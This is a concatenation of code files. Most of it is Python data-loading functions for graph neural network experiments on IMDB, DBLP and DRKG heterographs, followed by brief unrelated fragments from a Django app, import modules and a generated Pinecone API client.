G.nodes[ntype].data['motifs'] = node_motifs[ntype].float()
G = keep_frequent_motifs(G)
G = motif_distribution_to_zero_one(G, args)
for ntype in G.ntypes:
train_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
valid_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
test_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
metapaths = {}
if args.rw_supervision:
metapaths['actor'] = ['played', 'played_by'] * 2
metapaths['director'] = ['directed', 'directed_by'] * 2
metapaths['movie'] = ['played_by', 'played'] * 2
labels = pickle.load(open(os.patorch.join(data_folder, 'labels.pickle'), "rb"))
if args.splitpct is not None:
if args.splitpct==0.1:
train_val_test_idx = np.load(data_folder + 'train_val_test_idx.npz')
train_idx = train_val_test_idx['train_idx']
val_idx = train_val_test_idx['val_idx']
test_idx = train_val_test_idx['test_idx']
else:
train_idx,val_idx,test_idx=create_label_split(labels.shape[0],args.splitpct)
else:
if args.k_fold > 0:
train_val_test_idx = np.load(data_folder + 'train_val_test_idx_kfold-' + str(args.k_fold) + '.npz')
else:
if args.split == 5:
train_val_test_idx = np.load(data_folder + 'train_val_test_idx005.npz')
else:
train_val_test_idx = np.load(data_folder + 'train_val_test_idx.npz')
train_idx = train_val_test_idx['train_idx']
val_idx = train_val_test_idx['val_idx']
test_idx = train_val_test_idx['test_idx']
print(G)
print(labels)
train_idx = np.array(train_idx)
test_idx = np.array(test_idx)
val_idx = np.array(val_idx)
category = 'movie'
num_classes = 3
multilabel=False
if multilabel:
labels_n = torch.zeros((np.shape(labels)[0], num_classes))
for i in range(np.shape(labels)[0]):
labels_n[i, int(labels[i])] = 1
else:
labels_n = torch.tensor(labels)
labels = labels_n
featless_node_types = []
if args.use_clusterandrecover_loss:
for ntype in G.ntypes:
if G.nodes[ntype].data.get("h_f", None) is not None:
G.nodes[ntype].data['h_clusters'] = compute_cluster_assignemnts(G.nodes[ntype].data['h_f'],
cluster_number=args.num_clusters)
train_g.nodes[ntype].data['h_clusters'] =G.nodes[ntype].data['h_clusters']
valid_g.nodes[ntype].data['h_clusters'] = G.nodes[ntype].data['h_clusters']
test_g.nodes[ntype].data['h_clusters'] = G.nodes[ntype].data['h_clusters']
return train_idx,test_idx,val_idx,labels,category,num_classes,featless_node_types,metapaths,\
train_edges, test_edges, valid_edges, train_g, valid_g, test_g
def load_dblp_univ_preprocessed_data(args):
use_cuda = args.gpu
check_cuda = torch.cuda.is_available()
if use_cuda < 0:
check_cuda = False;
device = torch.device("cuda:" + str(use_cuda) if check_cuda else "cpu")
print("Using device", device)
cpu_device = torch.device("cpu");
# In[10]:
seed = 0;
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.backends.cudnn.deterministic = True
# In[12]:
data_folder = "../data/dblp_preprocessed/"
# In[13]:
# load to cpu for very large graphs
if args.few_shot:
edge_list = pickle.load(open(os.patorch.join(data_folder, 'k_shot_edge_list.pickle'), "rb"))
G = dgl.heterograph(edge_list)
else:
edge_list = pickle.load(open(os.patorch.join(data_folder, 'edge_list.pickle'), "rb"))
G = dgl.heterograph(edge_list)
features = pickle.load(open(os.patorch.join(data_folder, 'features.pickle'), "rb"))
for ntype in features.keys():
G.nodes[ntype].data['h_f'] = features[ntype]
if args.few_shot:
train_g, valid_g, test_g, train_edges, valid_edges, test_edges = create_edge_few_shot_splits(G, data_folder,
etype=[
'writted_by_3','3_writes'],
K=args.k_shot_edge)
else:
if args.test_edge_split==0:
train_g=G
valid_g=G
test_g=G
train_edges=edge_list
valid_edges=edge_list
test_edges=edge_list
else:
train_g, valid_g, test_g, train_edges, valid_edges, test_edges = create_edge_graph_splits(G,
0.975 - args.test_edge_split,
0.025,
data_folder)
if args.use_node_motifs:
node_motifs = pickle.load(open(os.patorch.join(data_folder, 'node_motifs.pickle'), "rb"))
for ntype in G.ntypes:
G.nodes[ntype].data['motifs'] = node_motifs[ntype].float()
G = keep_frequent_motifs(G)
G = motif_distribution_to_zero_one(G, args)
for ntype in G.ntypes:
train_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
valid_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
test_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
metapaths = {}
if args.rw_supervision:
multiplicity = 1
metapaths['paper'] = ['writted_by', 'writes'] * multiplicity
metapaths['conference'] = ['includes', 'writted_by', 'writes', 'prereseted_in'] * multiplicity
metapaths['author'] = ['writes','contains','contained_by', 'writted_by'] * multiplicity
labels = pickle.load(open(os.patorch.join(data_folder, 'labels.pickle'), "rb"))
#train_val_test_idx = np.load(data_folder + 'train_val_test_idx_kfold-' + str(args.k_fold) + '.npz')
train_val_test_idx = np.load(data_folder + 'train_val_test_idx.npz')
if args.k_fold > 0:
raise NotImplementedError
print(G)
print(labels)
train_idx = train_val_test_idx['train_idx']
val_idx = train_val_test_idx['val_idx']
test_idx = train_val_test_idx['test_idx']
train_idx = np.array(train_idx)
test_idx = np.array(test_idx)
val_idx = np.array(val_idx)
category = 'author'
num_classes = 4
if num_classes > 1:
labels_n = torch.zeros((np.shape(labels)[0], num_classes))
for i in range(np.shape(labels)[0]):
labels_n[i, int(labels[i])] = 1
else:
labels_n = labels
labels = labels_n
featless_node_types = ['conference']
if args.use_clusterandrecover_loss:
for ntype in G.ntypes:
if G.nodes[ntype].data.get("h_f", None) is not None:
G.nodes[ntype].data['h_clusters'] = compute_cluster_assignemnts(G.nodes[ntype].data['h_f'],
cluster_number=args.num_clusters)
train_g.nodes[ntype].data['h_clusters'] =G.nodes[ntype].data['h_clusters']
valid_g.nodes[ntype].data['h_clusters'] = G.nodes[ntype].data['h_clusters']
test_g.nodes[ntype].data['h_clusters'] = G.nodes[ntype].data['h_clusters']
return train_idx,test_idx,val_idx,labels,category,num_classes,featless_node_types,metapaths,\
train_edges, test_edges, valid_edges, train_g, valid_g, test_g
def re_e_list(edge_list,folder):
n_edge_list={}
for k in edge_list.keys():
nk=(k[0],k[0]+"_"+k[1]+"_"+k[2],k[2])
n_edge_list[nk]=edge_list[k]
pickle.dump(n_edge_list, open(os.patorch.join(folder, "edge_list.pickle"), "wb"),
protocol=4);
return n_edge_list
def load_drkg_univ_data(args):
def create_dgl_hetero_from_triplets(triplets):
entity_dictionary = {}
def insert_entry(entry, ent_type, dic):
if ent_type not in dic:
dic[ent_type] = {}
ent_n_id = len(dic[ent_type])
if entry not in dic[ent_type]:
dic[ent_type][entry] = ent_n_id
return dic
for triple in triplets:
src = triple[0]
split_src = src.split('::')
src_type = split_src[0]
dest = triple[2]
split_dest = dest.split('::')
dest_type = split_dest[0]
insert_entry(src, src_type, entity_dictionary)
insert_entry(dest, dest_type, entity_dictionary)
edge_dictionary = {}
for triple in triplets:
src = triple[0]
split_src = src.split('::')
src_type = split_src[0]
dest = triple[2]
split_dest = dest.split('::')
dest_type = split_dest[0]
src_int_id = entity_dictionary[src_type][src]
dest_int_id = entity_dictionary[dest_type][dest]
pair = (src_int_id, dest_int_id)
etype = (src_type, triple[1], dest_type)
if etype in edge_dictionary:
edge_dictionary[etype] += [pair]
else:
edge_dictionary[etype] = [pair]
graph = dgl.heterograph(edge_dictionary)
return graph
use_cuda = args.gpu
check_cuda = torch.cuda.is_available()
if use_cuda < 0:
check_cuda = False;
device = torch.device("cuda:" + str(use_cuda) if check_cuda else "cpu")
print("Using device", device)
cpu_device = torch.device("cpu");
# In[10]:
seed = 0;
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.backends.cudnn.deterministic = True
# In[12]:
data_folder = "../data/drkg/drkg/"
#df = pd.read_csv(data_folder+'drkg.tsv', sep="\t", header=None)
#triplets = df.values.tolist()
#G = create_dgl_hetero_from_triplets(triplets)
#train_g, valid_g, test_g, train_edges, valid_edges, test_edges = create_edge_graph_splits(G, 0.95, 0.025,
# data_folder)
splits_dir=pickle.load(open(os.patorch.join(data_folder, 'splits_dir.pickle'), "rb"))
train_g=splits_dir['train_g']
valid_g=splits_dir['valid_g']
test_g=splits_dir['test_g']
train_edges=splits_dir['train_edges']
valid_edges=splits_dir['valid_edges']
test_edges=splits_dir['test_edges']
G=train_g
if args.use_node_motifs:
node_motifs = pickle.load(open(os.patorch.join(data_folder, 'node_motifs.pickle'), "rb"))
for ntype in G.ntypes:
G.nodes[ntype].data['motifs'] = node_motifs[ntype].float()
G = keep_frequent_motifs(G)
G = motif_distribution_to_zero_one(G, args)
for ntype in G.ntypes:
train_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
valid_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
test_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
metapaths = {}
if args.rw_supervision:
metapaths['Gene'] = ['DGIDB::INHIBITOR::Gene:Compound','DRUGBANK::treats::Compound:Disease'] * 1
metapaths['Compound'] = ['DRUGBANK::treats::Compound:Disease','Hetionet::DdG::Disease:Gene'] * 1
#metapaths['function'] = ['0', 'played'] * 1
print(test_g)
train_idx = None
val_idx = None
test_idx = None
category = None
num_classes = None
labels= None
featless_node_types = G.ntypes
return train_idx,test_idx,val_idx,labels,category,num_classes,featless_node_types,metapaths,\
train_edges, test_edges, valid_edges, train_g, valid_g, test_g
def load_drkg_edge_few_shot_data(args):
def create_dgl_hetero_from_triplets(triplets):
entity_dictionary = {}
def insert_entry(entry, ent_type, dic):
if ent_type not in dic:
dic[ent_type] = {}
ent_n_id = len(dic[ent_type])
if entry not in dic[ent_type]:
dic[ent_type][entry] = ent_n_id
return dic
for triple in triplets:
src = triple[0]
split_src = src.split('::')
src_type = split_src[0]
dest = triple[2]
split_dest = dest.split('::')
dest_type = split_dest[0]
insert_entry(src, src_type, entity_dictionary)
insert_entry(dest, dest_type, entity_dictionary)
edge_dictionary = {}
for triple in triplets:
src = triple[0]
split_src = src.split('::')
src_type = split_src[0]
dest = triple[2]
split_dest = dest.split('::')
dest_type = split_dest[0]
src_int_id = entity_dictionary[src_type][src]
dest_int_id = entity_dictionary[dest_type][dest]
pair = (src_int_id, dest_int_id)
etype = (src_type, triple[1], dest_type)
if etype in edge_dictionary:
edge_dictionary[etype] += [pair]
else:
edge_dictionary[etype] = [pair]
pickle.dump(entity_dictionary, open(os.patorch.join("../data/drkg/drkg/", "drkg_entity_id_map.pickle"), "wb"),
protocol=4);
graph = dgl.heterograph(edge_dictionary)
return graph
use_cuda = args.gpu
check_cuda = torch.cuda.is_available()
if use_cuda < 0:
check_cuda = False;
device = torch.device("cuda:" + str(use_cuda) if check_cuda else "cpu")
print("Using device", device)
cpu_device = torch.device("cpu");
# In[10]:
seed = 0;
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.backends.cudnn.deterministic = True
# In[12]:
data_folder = "../data/drkg/drkg/"
'''
df = pd.read_csv(data_folder+'drkg.tsv', sep="\t", header=None)
triplets = df.values.tolist()
G = create_dgl_hetero_from_triplets(triplets)
train_g, valid_g, test_g, train_edges, valid_edges, test_edges = create_edge_graph_splits(G, 1, 0,
data_folder)
'''
splits_dir=pickle.load(open(os.patorch.join(data_folder, 'complete_splits_dir.pickle'), "rb"))
train_g=splits_dir['train_g']
valid_g=splits_dir['valid_g']
test_g=splits_dir['test_g']
train_edges=splits_dir['train_edges']
valid_edges=splits_dir['valid_edges']
test_edges=splits_dir['test_edges']
G=train_g
if args.use_node_motifs:
node_motifs = pickle.load(open(os.patorch.join(data_folder, 'node_motifs.pickle'), "rb"))
for ntype in G.ntypes:
G.nodes[ntype].data['motifs'] = node_motifs[ntype].float()
G = keep_frequent_motifs(G)
G = motif_distribution_to_zero_one(G, args)
for ntype in G.ntypes:
train_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
valid_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
test_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
metapaths = {}
if args.rw_supervision:
metapaths['Gene'] = ['DGIDB::INHIBITOR::Gene:Compound','DRUGBANK::treats::Compound:Disease'] * 1
metapaths['Compound'] = ['DRUGBANK::treats::Compound:Disease','Hetionet::DdG::Disease:Gene'] * 1
#metapaths['function'] = ['0', 'played'] * 1
print(test_g)
train_idx = None
val_idx = None
test_idx = None
category = None
num_classes = None
labels= None
featless_node_types = G.ntypes
return train_idx,test_idx,val_idx,labels,category,num_classes,featless_node_types,metapaths,\
train_edges, test_edges, valid_edges, train_g, valid_g, test_g
def load_query_biodata_univ_data(args):
use_cuda = args.gpu
check_cuda = torch.cuda.is_available()
if use_cuda < 0:
check_cuda = False;
device = torch.device("cuda:" + str(use_cuda) if check_cuda else "cpu")
print("Using device", device)
cpu_device = torch.device("cpu");
# In[10]:
seed = 0;
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.backends.cudnn.deterministic = True
# In[12]:
data_folder = "../data/query_biodata/"
# In[13]:
#edge_list = pickle.load(open(os.patorch.join(data_folder, 'edge_list.pickle'), "rb"))
#G = dgl.heterograph(edge_list)
#train_g, valid_g, test_g, train_edges, valid_edges, test_edges = create_edge_graph_splits(G, 0.95, 0.025,
# data_folder)
splits_dir=pickle.load(open(os.patorch.join(data_folder, 'splits_dir.pickle'), "rb"))
train_g=splits_dir['train_g']
valid_g=splits_dir['valid_g']
test_g=splits_dir['test_g']
train_edges=splits_dir['train_edges']
valid_edges=splits_dir['valid_edges']
test_edges=splits_dir['test_edges']
G=train_g
if args.use_node_motifs:
node_motifs = pickle.load(open(os.patorch.join(data_folder, 'node_motifs.pickle'), "rb"))
for ntype in G.ntypes:
G.nodes[ntype].data['motifs'] = node_motifs[ntype].float()
G = keep_frequent_motifs(G)
G = motif_distribution_to_zero_one(G, args)
for ntype in G.ntypes:
train_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
valid_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
test_g.nodes[ntype].data['motifs'] = G.nodes[ntype].data['motifs']
metapaths = {}
if args.rw_supervision:
metapaths['drug'] = ['drug_sexual_disorder_drug', 'drug_sleep_disorder_drug'] * 1
metapaths['protein'] = ['protein_activation_protein', 'protein_activation_protein'] * 1
#metapaths['function'] = ['0', 'played'] * 1
print(test_g)
train_idx = None
val_idx = None
test_idx = None
category = None
num_classes = None
labels= None
featless_node_types = G.ntypes
return train_idx,test_idx,val_idx,labels,category,num_classes,featless_node_types,metapaths,\
train_edges, test_edges, valid_edges, train_g, valid_g, test_g
def load_imdb_preprocessed_data(args):
use_cuda = args.gpu
check_cuda = torch.cuda.is_available()
if use_cuda < 0:
check_cuda = False;
device = torch.device("cuda:" + str(use_cuda) if check_cuda else "cpu")
print("Using device", device)
cpu_device = torch.device("cpu");
# In[10]:
seed = 0;
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.backends.cudnn.deterministic = True
# In[12]:
data_folder = "../data/imdb_preprocessed/"
# In[13]:
# load to cpu for very large graphs
edge_list = pickle.load(open(os.patorch.join(data_folder, 'edge_list.pickle'), "rb"))
G = dgl.heterograph(edge_list)
features = pickle.load(open(os.patorch.join(data_folder, 'features.pickle'), "rb"))
for ntype in features.keys():
G.nodes[ntype].data['h_f'] = features[ntype]
if args.use_node_motifs:
node_motifs = pickle.load(open(os.patorch.join(data_folder, 'node_motifs.pickle'), "rb"))
for ntype in G.ntypes:
G.nodes[ntype].data['motifs'] = node_motifs[ntype].float()
G=keep_frequent_motifs(G)
G=motif_distribution_to_zero_one(G,args)
metapaths = {}
if args.rw_supervision is not None and args.rw_supervision :
metapaths['actor'] = ['played', 'played_by'] * 2
metapaths['director'] = ['directed','directed_by'] * 2
metapaths['movie'] = ['played_by', 'played'] * 2
labels = pickle.load(open(os.patorch.join(data_folder, 'labels.pickle'), "rb"))
if args.k_fold>0:
train_val_test_idx = np.load(data_folder + 'train_val_test_idx_kfold-'+str(args.k_fold)+'.npz')
else:
if args.split==5:
train_val_test_idx = np.load(data_folder + 'train_val_test_idx005.npz')
else:
train_val_test_idx = np.load(data_folder + 'train_val_test_idx.npz')
print(G)
print(labels)
train_idx = train_val_test_idx['train_idx']
val_idx = train_val_test_idx['val_idx']
test_idx = train_val_test_idx['test_idx']
train_idx = np.array(train_idx)
test_idx = np.array(test_idx)
val_idx = np.array(val_idx)
category='movie'
num_classes = 3
if num_classes > 1:
labels_n = torch.zeros((np.shape(labels)[0], num_classes))
for i in range(np.shape(labels)[0]):
labels_n[i, int(labels[i])] = 1
else:
labels_n = labels
labels = labels_n
featless_node_types = []
if args.use_clusterandrecover_loss:
for ntype in G.ntypes:
if G.nodes[ntype].data.get("h_f", None) is not None:
G.nodes[ntype].data['h_clusters']=compute_cluster_assignemnts(G.nodes[ntype].data['h_f'],cluster_number=args.num_clusters)
return train_idx,test_idx,val_idx,labels,G,category,num_classes,featless_node_types,metapaths
def load_dblp_preprocessed_data(args):
use_cuda = args.gpu
check_cuda = torch.cuda.is_available()
if use_cuda < 0:
check_cuda = False;
device = torch.device("cuda:" + str(use_cuda) if check_cuda else "cpu")
print("Using device", device)
cpu_device = torch.device("cpu");
# In[10]:
seed = 0;
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.backends.cudnn.deterministic = True
# In[12]:
data_folder = "../data/dblp_preprocessed/"
# In[13]:
# load to cpu for very large graphs
edge_list=pickle.load(open(os.patorch.join(data_folder, 'edge_list.pickle'), "rb"))
G = dgl.heterograph(edge_list)
features = pickle.load(open(os.patorch.join(data_folder, 'features.pickle'), "rb"))
for ntype in features.keys():
G.nodes[ntype].data['h_f'] =features[ntype]
if args.use_node_motifs:
node_motifs = pickle.load(open(os.patorch.join(data_folder, 'node_motifs.pickle'), "rb"))
for ntype in G.ntypes:
G.nodes[ntype].data['motifs'] = node_motifs[ntype].float()
G = keep_frequent_motifs(G)
G = motif_distribution_to_zero_one(G,args)
labels = pickle.load(open(os.patorch.join(data_folder, 'labels.pickle'), "rb"))
train_val_test_idx = np.load(data_folder + 'train_val_test_idx.npz')
print(G)
metapaths = {}
if args.rw_supervision:
multiplicity=1
metapaths['paper'] = ['writted_by', 'writes'] * multiplicity
metapaths['conference'] = ['includes','writted_by', 'writes','prereseted_in'] * multiplicity
metapaths['author'] = ['writes', 'writted_by'] * multiplicity
print(labels)
train_idx = train_val_test_idx['train_idx']
val_idx = train_val_test_idx['val_idx']
test_idx = train_val_test_idx['test_idx']
train_idx = np.array(train_idx)
test_idx = np.array(test_idx)
val_idx = np.array(val_idx)
category='author'
num_classes = 4
if num_classes > 1:
labels_n = torch.zeros((np.shape(labels)[0], num_classes))
for i in range(np.shape(labels)[0]):
labels_n[i, int(labels[i])] = 1
else:
labels_n = labels
labels = labels_n
featless_node_types = ['conference']
if args.use_clusterandrecover_loss:
for ntype in G.ntypes:
if G.nodes[ntype].data.get("h_f", None) is not None:
G.nodes[ntype].data['h_clusters']=compute_cluster_assignemnts(G.nodes[ntype].data['h_f'],cluster_number=args.num_clusters)
return train_idx,test_idx,val_idx,labels,G,category,num_classes,featless_node_types,metapaths
def load_imdb_data(args):
use_cuda = args.gpu
check_cuda = torch.cuda.is_available()
if use_cuda < 0:
check_cuda = False;
device = torch.device("cuda:" + str(use_cuda) if check_cuda else "cpu")
print("Using device", device)
cpu_device = torch.device("cpu");
# In[10]:
seed = 0;
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.backends.cudnn.deterministic = True
# In[12]:
data_folder = "../data/imdb_data/"
# In[13]:
# load to cpu for very large graphs
G = pickle.load(open(os.patorch.join(data_folder, 'graph_red.pickle'), "rb")).to(torch.device("cpu"))
# extract adult label from graph
label_type='genre'
if label_type=='adult':
labels = G.nodes['movie'].data['features'][:, 602]
G.nodes['movie'].data['features'] = torch.cat(
(G.nodes['movie'].data['features'][:, :602], G.nodes['movie'].data['features'][:, 603:]), 1)
elif label_type=='genre':
# last 30 are the genre labels
#CHECK HOW MANY ARE THE GENRE LABELS MAYBE 28
labels = G.nodes['movie'].data['features'][:, -30:]
# Discard very rare classes
s_labels=sum(labels)
filt_nbr=40
filter_labels=s_labels>=filt_nbr
labels = labels[:, filter_labels]
G.nodes['movie'].data['features'] = (G.nodes['movie'].data['features'][:, :-30])
else:
raise NotImplementedError
# In[15]:
G.nodes['person'].data['features'] = G.nodes['person'].data['features'].float()
G.nodes['movie'].data['features'] = G.nodes['movie'].data['features'].float()
labels=labels.float().cpu()
print(G)
# In[16]:
# G.nodes['application'].data['features'].fill_(0.0);
# In[17]:
print(labels)
# In[18]:
label_indices = [i for i in range(len(labels))]
msss = MultilabelStratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=seed)
train_idx, test_idx = next(msss.split(label_indices, labels));
msss = MultilabelStratifiedShuffleSplit(n_splits=1, test_size=0.5, random_state=seed);
valid_index_temp, test_index_temp = next(msss.split(list(test_idx), np.array(labels)[test_idx]));
val_idx = np.array(test_idx)[valid_index_temp]
test_idx = np.array(test_idx)[test_index_temp]
train_idx = np.array(train_idx)
test_idx = np.array(test_idx)
val_idx = np.array(val_idx)
category='movie'
for ntype in G.ntypes:
if G.nodes[ntype].data.get("features", None) is not None:
G.nodes[ntype].data['h_f'] = G.nodes[ntype].data['features']
num_classes=labels.shape[1]
featless_node_types = []
if args.use_clusterandrecover_loss:
for ntype in G.ntypes:
if G.nodes[ntype].data.get("h_f", None) is not None:
G.nodes[ntype].data['h_clusters']=compute_cluster_assignemnts(G.nodes[ntype].data['h_f'],cluster_number=args.num_clusters)
return train_idx,test_idx,val_idx,labels,G,category,num_classes,featless_node_types
def load_gen_data(args):
data = load_data(args.dataset, bfs_level=args.bfs_level, relabel=args.relabel)
num_nodes = data.num_nodes
num_rels = data.num_rels
num_classes = data.num_classes
labels = data.labels
train_idx = data.train_idx
test_idx = data.test_idx
# split dataset into train, validate, test
if args.validation:
val_idx = train_idx[:len(train_idx) // 5]
train_idx = train_idx[len(train_idx) // 5:]
else:
val_idx = train_idx
# since the nodes are featureless, the input feature is then the node id.
feats = torch.arange(num_nodes)
return num_nodes,num_rels,num_classes,train_idx,test_idx,val_idx,labels,feats,data.edge_type,data.edge_norm,data.edge_src,data.edge_dst | 41.315245 | 181 | 0.624054 | 15,700 | 111,923 | 4.183121 | 0.03879 | 0.0333 | 0.049242 | 0.050704 | 0.865794 | 0.844766 | 0.823738 | 0.807583 | 0.795097 | 0.788002 | 0 | 0.009693 | 0.245106 | 111,923 | 2,709 | 182 | 41.315245 | 0.767617 | 0.052268 | 0 | 0.776056 | 0 | 0 | 0.083588 | 0.01544 | 0 | 0 | 0 | 0.001846 | 0.003756 | 1 | 0.026291 | false | 0 | 0.007981 | 0.000469 | 0.061502 | 0.035681 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a0d3584dbffac30a18a212ec3e447022eaf0a80c | 119 | py | Python | cedar/context_processors.py | stewardshiptools/stewardshiptools | ee5d27e7b0d5d4947f34ad02bdf63a06ad0a5c3e | [
"MIT"
] | null | null | null | cedar/context_processors.py | stewardshiptools/stewardshiptools | ee5d27e7b0d5d4947f34ad02bdf63a06ad0a5c3e | [
"MIT"
] | 11 | 2020-03-24T15:29:46.000Z | 2022-03-11T23:14:48.000Z | cedar/context_processors.py | stewardshiptools/stewardshiptools | ee5d27e7b0d5d4947f34ad02bdf63a06ad0a5c3e | [
"MIT"
] | null | null | null | from django.conf import settings
def is_haida(request):
return {'IS_HAIDA': getattr(settings, 'IS_HAIDA', False)}
| 23.8 | 61 | 0.739496 | 17 | 119 | 5 | 0.705882 | 0.247059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.134454 | 119 | 4 | 62 | 29.75 | 0.825243 | 0 | 0 | 0 | 0 | 0 | 0.134454 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
a0fe8dac5aa47e69fb324c75e5610ce3f4843bcd | 114 | py | Python | src/backbones/__init__.py | zsz00/single-shot-detector | 45f977d6622b083d5817167bc9da20420299b273 | [
"MIT"
] | 1 | 2018-04-25T09:34:24.000Z | 2018-04-25T09:34:24.000Z | src/backbones/__init__.py | zsz00/single-shot-detector | 45f977d6622b083d5817167bc9da20420299b273 | [
"MIT"
] | null | null | null | src/backbones/__init__.py | zsz00/single-shot-detector | 45f977d6622b083d5817167bc9da20420299b273 | [
"MIT"
] | null | null | null | from src.backbones.mobilenet_v1 import mobilenet_v1_base
from src.backbones.mobilenet_v2 import mobilenet_v2_base
| 38 | 56 | 0.894737 | 18 | 114 | 5.333333 | 0.444444 | 0.145833 | 0.333333 | 0.520833 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037736 | 0.070175 | 114 | 2 | 57 | 57 | 0.867925 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9d093407d75b5342d1913cfbcc5ecb8f65fc37f5 | 122 | py | Python | th2_data_services/events_tree/__init__.py | th2-net/th2-data-services | b2177aa903705fb248151b3ca4d0c53056b87cff | [
"Apache-2.0"
] | 3 | 2021-08-03T07:50:55.000Z | 2022-03-23T15:42:07.000Z | th2_data_services/events_tree/__init__.py | th2-net/th2-data-services | b2177aa903705fb248151b3ca4d0c53056b87cff | [
"Apache-2.0"
] | 7 | 2021-11-12T16:22:42.000Z | 2022-03-24T08:56:30.000Z | th2_data_services/events_tree/__init__.py | th2-net/th2-data-services | b2177aa903705fb248151b3ca4d0c53056b87cff | [
"Apache-2.0"
] | null | null | null | from .events_tree import EventsTree
from .events_tree import EventsTree2
from .parent_events_tree import ParentEventsTree
| 30.5 | 48 | 0.877049 | 16 | 122 | 6.4375 | 0.5 | 0.291262 | 0.466019 | 0.38835 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009091 | 0.098361 | 122 | 3 | 49 | 40.666667 | 0.927273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
9d223e325192fce99a9f90ec75a3d4f869cc171b | 24,919 | py | Python | pinecone/core/client/api/index_operations_api.py | amourao/pinecone-python-client | 89582d3b32726187fea161b5f9765a582ddea76b | [
"ISC"
] | 7 | 2021-10-29T19:50:48.000Z | 2022-03-17T17:07:48.000Z | pinecone/core/client/api/index_operations_api.py | amourao/pinecone-python-client | 89582d3b32726187fea161b5f9765a582ddea76b | [
"ISC"
] | 24 | 2021-10-07T20:40:28.000Z | 2022-03-31T17:35:23.000Z | pinecone/core/client/api/index_operations_api.py | amourao/pinecone-python-client | 89582d3b32726187fea161b5f9765a582ddea76b | [
"ISC"
] | 4 | 2021-10-22T01:32:31.000Z | 2022-03-08T18:54:34.000Z | #
# Copyright (c) 2020-2021 Pinecone Systems Inc. All right reserved.
#
"""
Pinecone API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: version not set
Contact: support@pinecone.io
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from pinecone.core.client.api_client import ApiClient, Endpoint as _Endpoint
from pinecone.core.client.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from pinecone.core.client.model.create_request import CreateRequest
from pinecone.core.client.model.index_meta import IndexMeta
from pinecone.core.client.model.patch_request import PatchRequest
class IndexOperationsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __create_index(
self,
**kwargs
):
"""create_index # noqa: E501
